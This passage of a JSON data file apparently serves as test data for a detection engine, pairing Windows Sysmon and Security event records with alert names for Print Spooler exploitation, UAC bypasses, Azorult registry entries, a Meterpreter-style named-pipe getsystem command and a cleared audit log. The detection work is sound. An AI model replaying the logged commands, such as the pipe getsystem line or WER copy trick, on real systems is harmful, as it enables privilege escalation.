Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 
13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler 
Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 
13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution_attributes":{"ProcessID":3068,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 
(WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 
09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 
07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 
12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution_attributes":{"ProcessID":780,"ThreadID":3812},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using 
MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-09 02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 
02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass 